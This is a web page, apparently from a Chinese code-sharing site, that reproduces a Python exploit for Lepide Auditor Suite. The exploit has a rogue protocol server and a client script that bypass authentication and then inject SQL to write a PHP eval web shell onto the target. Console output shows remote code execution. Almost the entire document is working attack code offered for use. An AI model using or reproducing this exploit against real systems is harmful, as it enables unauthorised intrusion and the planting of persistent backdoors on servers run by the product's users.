扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 |
#!/usr/bin/python """ Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution Vulnerability Vendor: http://www.lepide.com/ File: lepideauditorsuite.zip SHA1: 3c003200408add04308c04e3e0ae03b7774e4120 Download: http://www.lepide.com/lepideauditor/download.html Analysis: https://www.offensive-security.com/vulndev/auditing-the-auditor/ Summary: ======== The application allows an attacker to specify a server where a custom protocol is implemented. This server performs the authentication and allows an attacker to execute controlled SQL directly against the database as root. Additional code: ================ When I wrote this poc, I didn't combine the server and client into a single poc. So below is the client-poc.py code: root@kali:~# cat client-poc.py #!/usr/bin/python import requests import sys if len(sys.argv) < 3: print "(+) usage: %s <target> <attacker's server>" % sys.argv[0] sys.exit(-1) target = sys.argv[1] server = sys.argv[2] s = requests.Session() print "(+) sending auth bypass" s.post('http://%s:7778/' % target, data = {'servername':server, 'username':'whateva','password':'thisisajoke!','submit':''}, allow_redirects=False) print "(+) sending code execution request" s.get('http://%s:7778/genratereports.php' % target, params = {'path':'lol','daterange':'2@3','id':'6'}) Example: ======== root@kali:~# ./server-poc.py Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution by mr_me 2016 (+) waiting for the target... (+) connected by ('172.16.175.174', 50541) (+) got a login request (+) got a username: test (+) got a password: hacked (+) sending SUCCESS packet (+) send string successful (+) connected by ('172.16.175.174', 50542) (+) got a login request (+) got a username: test (+) got a password: hacked (+) sending SUCCESS packet (+) send string successful (+) got a column request (+) got http request id: 6 (+) got http request path: lol (+) send string successful (+) got a filename request (+) got http request daterange: 1@9 -23:59:59 (+) got http request id: 6 (+) got http request path: lol (+) successfully sent tag (+) successfully sent file! (+) file sent successfully (+) done! Remote Code Execution: http://172.16.175.174:7778/offsec.php?e=phpinfo(); In another console: root@kali:~# ./client-poc.py 172.16.175.174 172.16.175.1 (+) sending auth bypass (+) sending code execution request """ import struct import socket from thread import start_new_thread import struct LOGIN= 601 COLUMN = 604 FILENAME = 603 VALID = 2 TAGR= 4 FILEN = 5 SUCCESS = "_SUCCESS_" def get_string(conn): size = struct.unpack(">i", conn.recv(4))[0] data = conn.recv(size).decode("utf-16") conn.send(struct.pack(">i", VALID)) return data def send_string(conn, string): size = len(string.encode("utf-16-le")) conn.send(struct.pack(">i", size)) conn.send(string.encode("utf-16-le")) return struct.unpack(">i", conn.recv(4))[0] def send_tag(conn, tag): conn.send(struct.pack(">i", TAGR)) conn.send(struct.pack(">i", tag)) return struct.unpack(">i", conn.recv(4))[0] def send_file(conn, filedata): if send_tag(conn, FILEN) == 2: print "(+) successfully sent tag" # send length of file conn.send(struct.pack(">i", len(filedata.encode("utf-16-le")))) # send the malicious payload conn.send(filedata.encode("utf-16-le")) if struct.unpack(">i", conn.recv(4))[0] == 2: print "(+) successfully sent file!" if send_tag(conn, VALID) == 2: return True return False def client_thread(conn): """ Let's put it this way, my mum's not proud of my code. """ while True: data = conn.recv(4) if data: resp = struct.unpack(">i", data)[0] if resp == 4: code = conn.recv(resp) resp = struct.unpack(">i", code)[0] # stage 1 if resp == LOGIN: print "(+) got a login request" # send a VALID response back conn.send(struct.pack(">i", VALID)) # now we expect to get the username and password print "(+) got a username: %s" % get_string(conn) print "(+) got a password: %s" % get_string(conn) # now we try to send to send a success packet print "(+) sending SUCCESS packet" if send_string(conn, SUCCESS) == 2: print "(+) send string successful" # stage 2 elif resp == COLUMN: print "(+) got a column request" # send a VALID response back conn.send(struct.pack(">i", VALID)) print "(+) got http request id: %s" % get_string(conn) print "(+) got http request path: %s" % get_string(conn) if send_string(conn, "foo-bar") == 2: print "(+) send string successful" # stage 3 - this is where the exploitation is elif resp == FILENAME: print "(+) got a filename request" conn.send(struct.pack(">i", VALID)) # now we read back 3 strings... print "(+) got http request daterange: %s" % get_string(conn) print "(+) got http request id: %s" % get_string(conn) print "(+) got http request path: %s" % get_string(conn) # exploit! if send_file(conn, "select '<?php eval($_GET[e]); ?>' into outfile '../../www/offsec.php';"): print "(+) file sent successfully" print "(+) done! Remote Code Execution: http://%s:7778/offsec.php?e=phpinfo();" % (addr[0]) break conn.close() HOST = '0.0.0.0' PORT = 1056 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((HOST, PORT)) s.listen(10) print "Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution" print "by mr_me 2016\t\n" print "(+) waiting for the target..." while True: # blocking call, waits to accept a connection conn, addr = s.accept() print '(+) connected by %s' % addr start_new_thread(client_thread, (conn,)) s.close() |
体验盒子
